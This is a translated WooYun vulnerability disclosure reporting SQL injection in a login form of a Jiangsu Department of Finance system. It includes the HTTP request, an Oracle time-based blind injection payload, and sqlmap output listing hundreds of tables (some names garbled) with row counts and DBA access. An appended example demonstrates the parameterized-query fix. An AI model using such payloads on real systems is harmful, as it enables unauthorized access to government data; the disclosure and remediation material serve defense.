Vulnerability summary

Defect ID: wooyun-2016-0167313

Title: Jiangsu Provincial Department of Finance, an important system with a SQL injection that leaks the whole site's data (several hundred tables / DBA privileges)

Vendor: 江苏省财政厅 (Jiangsu Provincial Department of Finance)

Author: 逆流冰河

Submitted: 2016-01-04 22:50

Fixed: 2016-02-22 17:50

Published: 2016-02-22 17:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-04: details sent to the vendor, awaiting the vendor's handling
2016-01-08: vendor confirmed; details visible to the vendor only
2016-01-18: details opened to core white hats and domain experts
2016-01-28: details opened to regular white hats
2016-02-07: details opened to intern white hats
2016-02-22: details opened to the public

Brief description:

The Department of Finance: they have money.

Detailed description:

1. Injection point

POST **.**.**.**:8082/jsicpa/common/login.do?method=login HTTP/1.1
Host: **.**.**.**:8082
Connection: keep-alive
Content-Length: 67
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:8082/jsicpa/common/login.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: userType=0; JSESSIONID=CDE420317E68414DCE2BB770F811AB7B
userType=0&AS_usr=admin*&AS_psw=admin&userScreen=1366&AS_dynamicPwd=


2. Injection details
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userType=0&AS_usr=admin' AND 6888=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(68)||CHR(120)||CHR(105),5) AND 'XQqJ'='XQqJ&AS_psw=admin&userScreen=1366&AS_dynamicPwd=
---
back-end DBMS: Oracle
available databases [1]:
[*] JSICPA
3. Tables: more than 300
back-end DBMS: Oracle
Database: JSICPA
[396 tables]
+-------------------------------------------------------+
| BB_CONTENT\X07\\?A6C |
| BB_SDSHUQJBI\X1BA\X19\X05!9+\X05\X04J\X03SBAQ\X06CE!A |
| BI_TYPE9212\X11 |
| B_DITPATCHOID\X03\X0B\X08G |
| B_NEW_DISPITCH! |
| B_NOTICE\T& |
| B_READKRA\X05 |
| B_RECEIVE_12::AA |
| B_REJIER_P]09\X03\X05 |
| B_ROLLPUBLICITY\X02 |
| B_TOPIC\X03 |
| CPA168\T |
| D_FURNITURE\X03 |
| EMP_MSG\X11 |
| JBPM4_PARTICIPATION\T |
| K_CITYT]ANSPORT\X07K |
| K_COMP\X7FNY0912 |
| K_EVALAUTEYAAR\X05 |
| K_EXEMPTION! |
| K_MICFONOWORK! |
| K_MICFONO\X15\T\X11 |
| K_MICFOREGISTER\X03 |
| K_ORDER! |
| K_PARTYBRANCH! |
| K_PARTYNO\X05 |
| K_PBA!A!B |
| K_PENU\X03 |
| K_QCAAUDIT\X03\X02 |
| K_QOMPANYI20:41105 |
| K_ROLE\X02 |
| K_SURVEYTYPEDETAIL\X03 |
| K_USERROLEMENU\X15K\X05 |
| K_WEC_FLOW\X1D |
| K_WORKER}OST |
| K_YCKAREA\X11 |
| NIANJJAN\T |
| P_ANSWER\X11 |
| P_CASESTYPE\T\T\X05\T |
| P_CASES_CHECK\X11\X02\X03 |
| P_PP\\?81ICYI\X12\X03\X02\X04!A\T |
| S_APPROVAL\X11 |
| S_QRYCOND~TION |
| TBDBSYNTASK\X04 |
| WORKTINE\X04 |
| XSHPPPLYHOLDSULFHOVRI\X134\X17 |
| XS_HPPLYTRAINHOUY!\T\TQ\T |
| XS_PSBA\X1FE1 |
| Z_QUESTION\X15 |
| BASEINFO |
| BBCOMPANYFYQRY |
| BB_APPLY |
| BB_BBQTB |
| BB_CCSSSQKCJJB |
| BB_CHARGESTANDARD |
| BB_COMPANYLIVT |
| BB_COMPANYREPORTCOUNT |
| BB_CONTENT1 |
| BB_CONTENT120140514 |
| BB_CONTENT1_20150129 |
| BB_DXZHPGB |
| BB_FLSJB |
| BB_HBSJB |
| BB_HOUR |
| BB_INFOCHANGE |
| BB_JRZCPGB |
| BB_KJDSHB |
| BB_KJZSB |
| BB_KTSSJJB |
| BB_OTHERB |
| BB_QCHZB |
| BB_QSSHB |
| BB_QTZCPGB |
| BB_QYJZPGB |
| BB_SFKJJDB |
| BB_SJB |
| BB_SJMONEY |
| BB_SWDLB |
| BB_TEPI |
| BB_WHNJB |
| BB_YZB |
| BB_ZCPGB |
| BB_ZXSJB |
| B_ATTENDANCE |
| B_ATTENDSET |
| B_ATTENDTIME |
| B_BILL |
| B_BILL_DETAIL |
| B_BOOKORDER |
| B_CHECKERRESULT |
| B_CHECKGROUPRESULT |
| B_CITYFILE |
| B_DISPATCH |
| B_DISPATCHZJQ |
| B_DOCUMINTS1 |
| B_ENROLL |
| B_FILE |
| B_FILEAPPLY |
| B_FILELIST |
| B_FILESHARE |
| B_FILESHAREDETAIL |
| B_FINANCEFLOW |
| B_FLOWMGR |
| B_FLOWWORDINFO |
| B_INFORM |
| B_MAINTENANCEBOOK |
| B_MATERIAL |
| B_NEW |
| B_PAPER |
| B_PASTA |
| B_PUBLICITY |
| B_READER_0910_CHM |
| B_RECEJVE |
| B_SCORE |
| B_SCOREITYM |
| B_SYSTEMFILE |
| B_TEACHERA |
| B_TRAINING |
| B_TRAININGHOLDSALF |
| D_ASSETS |
| D_ASSETSDISCOUNT |
| D_ASSETSREPAIR |
| D_ASSETSTYPI |
| D_CAR |
| D_CQUIPMENT |
| F_FLOWNODETMP |
| F_FLOW_MESSAGE |
| F_FLOW_STEP |
| F_FLOW_TASK |
| F_MODEL_FLOW_AMONGNODE |
| F_MODEL_FLOW_MAIN |
| F_MODEL_FLOW_MAIN_TMP |
| F_MODEL_FLOW_NODE |
| JBPM4_COMMENT |
| JBPM4_DEPLOYMENT |
| JBPM4_DEPLOYPROPA |
| JBPM4_EXECUTION |
| JBPM4_HIST_ACTINST |
| JBPM4_HIST_DETAIL |
| JBPM4_HIST_PROCINST |
| JBPM4_HIST_TASK |
| JBPM4_HIST_VAR |
| JBPM4_ID_GROUP |
| JBPM4_ID_MEMBERSHIP |
| JBPM4_ID_USEA |
| JBPM4_JOBE |
| JBPM4_LOB |
| JBPM4_PARPERTY |
| JBPM4_SWIMQANE |
| JBPM4_TASK |
| JBPM4_VARIABLE |
| K_ACTJVITIES |
| K_AGWHEXCEPECT |
| K_APPLYBILL |
| K_AREA |
| K_ASSESSER |
| K_ATTICHFILE |
| K_AUDITBQLL |
| K_AUDITQCACPA |
| K_AUTOCODEA |
| K_AWARDA |
| K_AWARDTO |
| K_BILL_TEMP |
| K_CANCEL |
| K_CANDIDATES |
| K_CARD |
| K_CARTIFICATE |
| K_CICPA |
| K_CMPLOYEE |
| K_CNTAGENAY |
| K_CNTDEPART |
| K_CNTLINK |
| K_CNTMEMBER |
| K_CNTTYPE |
| K_COMPANY |
| K_COMPANY113834788 |
| K_COMPANY140109 |
| K_COMPANYNEWS |
| K_COMPANY_1209 |
| K_COMPANY_BACK |
| K_COMPANY_DEL1209 |
| K_COMPAY_IMP |
| K_CONFERENCERECORD |
| K_COSTPAY |
| K_COSTPAY_DETAIL |
| K_CPAPAYMENT |
| K_CUSTOMER |
| K_CUSTOMER_TFP |
| K_DEPARTMENT |
| K_DEPARTMENTSCHEDULE |
| K_DIC |
| K_DIC_BAK |
| K_DIRECTOR |
| K_DOCIMAGE2 |
| K_DOCIAAGE |
| K_DOGEXCEPECT |
| K_DOGEXCEPECT_20150202 |
| K_DOWNLOAIINFO |
| K_DXAM |
| K_EMPLOYEE_20140327 |
| K_EVALAUTOOPERA |
| K_EVALCHECK |
| K_EVALCOMPANY |
| K_EVALCOMPANY20140519 |
| K_EVALCOMPANY20140521 |
| K_EVALERROR |
| K_EVALRESULT |
| K_EVALRESULT0514 |
| K_EVALRESULT20140519 |
| K_EVALRESULT20140521 |
| K_EVALTEMP |
| K_EXAMINATIONENTRY |
| K_EXAMRESULTS |
| K_EXAM_DETAIL |
| K_GOURCOSTMAIN |
| K_GOVERNMENT |
| K_GRADE |
| K_GUDONG |
| K_GUDONG_20140327 |
| K_HOUACOSTMANAGE |
| K_INTEGAITY |
| K_LINK |
| K_LONGTEXT |
| K_MEMBER |
| K_MEMBERBRANCH |
| K_MEMBERPOST |
| K_MEMBERSHIPFEE |
| K_MENBERCPSTPAY |
| K_MESSAGEINFO |
| K_MICCOUNT |
| K_MICFO |
| K_MICFO1223 |
| K_MICFO130109 |
| K_MICFO172408947 |
| K_MICFO20151121 |
| K_MICFO20151221 |
| K_MICFOCT |
| K_MICFONO140843784 |
| K_MICFONO143324801 |
| K_MICFONO144232393 |
| K_MICFONO150641286 |
| K_MICFONO150806090 |
| K_MICFONO150927152 |
| K_MICFONO151559355 |
| K_MICFONO151918031 |
| K_MICFONO152130326 |
| K_MICFONO152320202 |
| K_MICFONO152519380 |
| K_MICFONO152809971 |
| K_MICFONO153014317 |
| K_MICFONOEDU |
| K_MICFONOJOINPARTY |
| K_MICFONO_BACKUP |
| K_MICFONO_TEMP |
| K_MICFO_1209 |
| K_MICFO_BACKUP |
| K_MICFO_DEL1209 |
| K_MICFO_IMP |
| K_MIGE |
| K_MIAFONO149347105AQ |
| K_MONREPORTCOLLECT |
| K_MONTHLYREPORT |
| K_NONTHLYCONTROL |
| K_OA_AUTOCODE |
| K_OFFICEINFOCHANGE |
| K_OFFICERECORD |
| K_OLDCANDIDATES |
| K_OLDCIRTIFICATE |
| K_OTP |
| K_PAPER |
| K_PAPER_DETAIL |
| K_PARTY |
| K_PARTYACTIVITIES |
| K_PARTYCOMMEND |
| K_PARTYDOC |
| K_PARTYEXPANSIAN |
| K_PARTYPOST |
| K_PARTYSYSTEM |
| K_PARTYTRAINING |
| K_PATTYADMIN |
| K_PAYPARAMETTER |
| K_PERSONINFOEHANGB |
| K_POSITION |
| K_QCACPA |
| K_QCACPA20151026 |
| K_QUESTIONBANK |
| K_QUESTIONRESULT |
| K_QUESTIONRESULT_20140327 |
| K_QUESTIONTEMPLATE |
| K_QUESTIONTEMPLATE_OLD |
| K_REPLY |
| K_REPORTVALIDATE |
| K_RESULTTYPE |
| K_ROLE_BB |
| K_SASK |
| K_SCORE |
| K_SMS |
| K_SMS_TASK |
| K_STAFF |
| K_SUPAPPEAL |
| K_SUPCASE |
| K_SUPDEFENSE |
| K_SUPERVISECOMPANY |
| K_SUPERVISEMAIN |
| K_SUPERVISERESULT |
| K_SUPERVISESUB |
| K_SUPERVISEUSER |
| K_SUPERVISION |
| K_SUPMEETING |
| K_SUPPROGRESS |
| K_SUPPUNISH |
| K_SUPQRY |
| K_SUPRESULTTRACK |
| K_SUPSUMMARY |
| K_SUPTASK |
| K_SUPVIEW |
| K_SURVEY |
| K_SURVEYDETAIL |
| K_SURVEYITEM |
| K_SURVEYITEMANSWER |
| K_SURVEYITEMDETAIL |
| K_SURVEYTYPE |
| K_TALENTS |
| K_TALENTS_20140327 |
| K_TEMPMICFONO0630 |
| K_TEMPSENDUSER |
| K_TESTERCOMPOSITION |
| K_TESTERNOTICE |
| K_TESTRESULT |
| K_TICKET |
| K_TICKETRESULT |
| K_TRADEPRIZE |
| K_TRADEPRIZERECORD |
| K_TRAINRECORD |
| K_UCAPWD |
| K_USERROLE |
| K_VERIFICATION |
| K_VERNMENT |
| K_VIOLATION |
| K_WAGEMANAGE |
| K_WEB_FLOW_STEP |
| K_WOMEN |
| K_WOMENBRANCH |
| K_WOMENPOST |
| K_WORKER |
| K_WORKERBRANCH |
| K_WORKINGSTATUS |
| K_YCKCOMPANY |
| K_YCKCPA |
| K_YCKCPANO |
| K_YCKCPANO_TEMP0921 |
| K_YCKCPA_BAK |
| K_YCKPWD |
| K_YCKQRCODE |
| K_YEARCHECKMANAGENO |
| K_YEARCHECKMANAGE |
| K_QICFOAO153112047 |
| L_BBLOG |
| L_LOG |
| PUNISHYEAR |
| P_CASES |
| P_POLICY_CHEIK |
| P_PPLICYTYPEA |
| P_QUEATION |
| P_TEMPLATE |
| P_TEMPLATEASK |
| QB_KJZXHFWFWA |
| SUEERVISION |
| SYSAUTOSQL |
| SYS_QRYINFO |
| S_AUTOHINTSELECT |
| S_AUTOHINTSELECT_BACKUP |
| S_CONFIG |
| S_INDEXOGR |
| S_LINEUP |
| S_MEANING |
| S_OTPINFO |
| S_TARGET |
| T1 |
| TALENTS |
| T_INSPECTION |
| T_QNSPECTIONNO |
| T_QQ |
| WORKING |
| XS_CONTENT |
| XS_CONTENT0831 |
| XS_CONTENT0831BAK |
| XS_CONTENTGXEMPTIUN |
| XS_GATHER |
| XS_TYPE |
| YEQRCMECKMANAGE |
| Z_K_QUESTIONTEMPLATE0606 |
| Z_K_QUEWXIONTEMPLATE0605 |
| Z_QUESTIONRESULT |
| Z_READER |
| Z_SHAREHOLDER |
| Z_SHAREHOLDERAD |
+-------------------------------------------------------+
Database: JSICPA
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| L_LOG | 432248 |
| BB_CONTENT1 | 318694 |
| BB_CONTENT1_20150129 | 173971 |
| BB_SJB | 137050 |
| BB_ZXSJB | 114812 |
| K_QUESTIONRESULT_20140327 | 91813 |
| K_QUESTIONRESULT | 73573 |
| BB_CONTENT120140514 | 70347 |
| Z_QUESTIONRESULT | 65304 |
| BB_YZB | 55710 |
| K_EVALRESULT0514 | 44322 |
| K_EVALRESULT20140519 | 44233 |
| K_EVALRESULT20140521 | 43966 |
| K_EVALRESULT | 43699 |
| Z_READER | 29846 |
| F_FLOW_MESSAGE | 22269 |
| K_YCKPWD | 16895 |
| K_EMPLOYEE_20140327 | 12541 |
| K_MONTHLYREPORT | 12084 |
| K_YCKCPA | 9844 |
| K_MICFONOEDU | 9374 |
| L_BBLOG | 8195 |
| BB_INFOCHANGE | 7563 |
| XS_CONTENT | 7315 |
| XS_CONTENT0831 | 7315 |
| K_MEMBERSHIPFEE | 7248 |
| K_MICFONO_TEMP | 7059 |
| K_MICFONO_BACKUP | 7053 |
| K_YCKCPANO | 6972 |
| XS_CONTENT0831BAK | 6538 |
| K_MICFO | 5846 |
| K_MICFO20151221 | 5769 |
| K_MICFO20151121 | 5713 |
| K_TALENTS | 5085 |
| K_MICFO1223 | 4861 |
| K_MICFO130109 | 4861 |
| K_MICFO_IMP | 4852 |
| K_MICFO_1209 | 4851 |
| K_MICFO_BACKUP | 4849 |
| BB_OTHERB | 4570 |
| K_GUDONG | 4238 |
| F_FLOW_STEP | 4114 |
| K_MICFONO140843784 | 3373 |
| K_TALENTS_20140327 | 2489 |
| F_MODEL_FLOW_NODE | 2281 |
| B_READER_0910_CHM | 2200 |
| K_GUDONG_20140327 | 2126 |
| F_MODEL_FLOW_AMONGNODE | 1912 |
| K_EVALERROR | 1657 |
| K_TEMPMICFONO0630 | 984 |
| K_YCKCOMPANY | 942 |
| K_MICFONO143324801 | 829 |
| K_MICFONO144232393 | 829 |
| S_OTPINFO | 804 |
| K_MICFONO150641286 | 773 |
| K_MICFONO150806090 | 773 |
| K_MICFONO150927152 | 773 |
| B_FILELIST | 772 |
| K_USERROLE | 759 |
| K_SUPPUNISH | 751 |
| K_OFFICERECORD | 733 |
| K_DOGEXCEPECT_20150202 | 662 |
| K_COMPANY | 538 |
| K_COMPANY_1209 | 516 |
| K_COMPANY_BACK | 514 |
| K_COMPANY140109 | 511 |
| K_COMPAY_IMP | 509 |
| K_ROLE_BB | 505 |
| K_EVALCOMPANY20140519 | 497 |
| K_EVALCOMPANY20140521 | 494 |
| K_EVALCOMPANY | 491 |
| K_DIC | 465 |
| K_CANCEL | 458 |
| K_MICFONO151559355 | 426 |
| F_MODEL_FLOW_MAIN | 369 |
| K_DIC_BAK | 337 |
| B_DISPATCH | 282 |
| BASEINFO | 270 |
| S_MEANING | 226 |
| K_MICFO_DEL1209 | 225 |
| F_MODEL_FLOW_MAIN_TMP | 221 |
| JBPM4_DEPLOYMENT | 180 |
| JBPM4_LOB | 180 |
| K_MONREPORTCOLLECT | 176 |
| B_ATTENDANCE | 139 |
| K_APPLYBILL | 129 |
| K_QUESTIONTEMPLATE | 121 |
| Z_K_QUESTIONTEMPLATE0606 | 121 |
| K_QUESTIONTEMPLATE_OLD | 120 |
| K_MICFONO152130326 | 106 |
| K_QCACPA | 99 |
| K_AUDITQCACPA | 98 |
| B_ATTENDSET | 90 |
| K_EVALTEMP | 89 |
| B_FLOWMGR | 88 |
| K_CONFERENCERECORD | 81 |
| K_CICPA | 68 |
| K_QCACPA20151026 | 68 |
| S_AUTOHINTSELECT | 61 |
| K_EVALAUTOOPERA | 60 |
| B_FLOWWORDINFO | 59 |
| T_QQ | 59 |
| Z_SHAREHOLDERAD | 59 |
| K_MICFONO152320202 | 57 |
| K_YCKCPANO_TEMP0921 | 54 |
| B_FILE | 53 |
| K_OTP | 53 |
| S_AUTOHINTSELECT_BACKUP | 42 |
| SYS_QRYINFO | 32 |
| K_DEPARTMENT | 24 |
| K_CNTMEMBER | 20 |
| K_DOCIMAGE2 | 20 |
| K_MICFONO152519380 | 18 |
| K_CUSTOMER | 16 |
| K_COMPANY_DEL1209 | 15 |
| K_AREA | 14 |
| TALENTS | 13 |
| K_MICFONO152809971 | 10 |
| BB_APPLY | 9 |
| K_CNTDEPART | 8 |
| K_SUPTASK | 7 |
| B_CITYFILE | 6 |
| T_INSPECTION | 6 |
| B_DISPATCHZJQ | 5 |
| K_EVALCHECK | 5 |
| K_SMS_TASK | 5 |
| K_MICFONO153014317 | 4 |
| K_SUPVIEW | 4 |
| K_SURVEYITEMDETAIL | 4 |
| B_ATTENDTIME | 3 |
| B_FILEAPPLY | 2 |
| K_AWARDTO | 2 |
| SYSAUTOSQL | 2 |
| BB_SFKJJDB | 1 |
| BB_WHNJB | 1 |
| K_MICFOCT | 1 |
| K_OA_AUTOCODE | 1 |
| K_YCKQRCODE | 1 |
| K_YEARCHECKMANAGE | 1 |
| K_YEARCHECKMANAGENO | 1 |
| S_CONFIG | 1 |
| Z_SHAREHOLDER | 1 |
+---------------------------+---------+
4. DBA privileges
current user is DBA: True

Proof of vulnerability:

I did not dare go any further.

Fix recommendation:

I did not dare go any further.
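The report stops short of a fix. For the record, the defect shown in the injection point is that AS_usr is pasted into SQL text, and the remedy is to bind it as a parameter. The following added example (mine, not the reporter's or the site's code; the users table and password are constructed, since the report does not show the real schema) replays the exact AS_usr value from the sqlmap payload against both a concatenated and a bound query on an in-memory SQLite database. SQLite has no DBMS_PIPE, so with concatenation the attacker's text reaches the SQL parser and is rejected as bad SQL, while with binding it is just a username that matches nothing.

```python
"""String concatenation versus bound parameters for the login lookup.

Added example; the table, its one row and the password are constructed.
"""
import sqlite3

CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (usr TEXT, psw TEXT)")
CONN.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")

# exact AS_usr value from the report's sqlmap payload (URL-decoded)
REPORT_PAYLOAD = ("admin' AND 6888=DBMS_PIPE.RECEIVE_MESSAGE("
                  "CHR(104)||CHR(68)||CHR(120)||CHR(105),5) AND 'XQqJ'='XQqJ")


def login_concat(usr: str, psw: str):
    """The vulnerable pattern: user input becomes part of the SQL text."""
    sql = f"SELECT usr FROM users WHERE usr='{usr}' AND psw='{psw}'"
    return CONN.execute(sql).fetchone()


def login_bound(usr: str, psw: str):
    """The fix: the statement is fixed text, the values travel as parameters."""
    sql = "SELECT usr FROM users WHERE usr=? AND psw=?"
    return CONN.execute(sql, (usr, psw)).fetchone()


def reaches_parser(login, usr: str, psw: str = "admin") -> bool:
    """True when the attacker's text was interpreted as SQL (here SQLite
    rejects the Oracle call it was asked to make) rather than as data."""
    try:
        login(usr, psw)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    print("concat reaches parser:", reaches_parser(login_concat, REPORT_PAYLOAD))
    print("bound reaches parser: ", reaches_parser(login_bound, REPORT_PAYLOAD))
    print("bound, real creds:    ", login_bound("admin", "correct-horse"))
```

The same split applies in the Java stack the .do URL suggests: a java.sql.PreparedStatement with ? placeholders and setString for AS_usr and AS_psw, instead of building the statement with string concatenation. Filtering keywords such as DBMS_PIPE at a WAF buys time but does not remove the defect.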

Copyright notice: when reposting, please credit the source: 逆流冰河@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-08 18:09

Vendor reply:

CNVD confirmed the situation described; it has been passed to CNCERT and forwarded to its Jiangsu branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet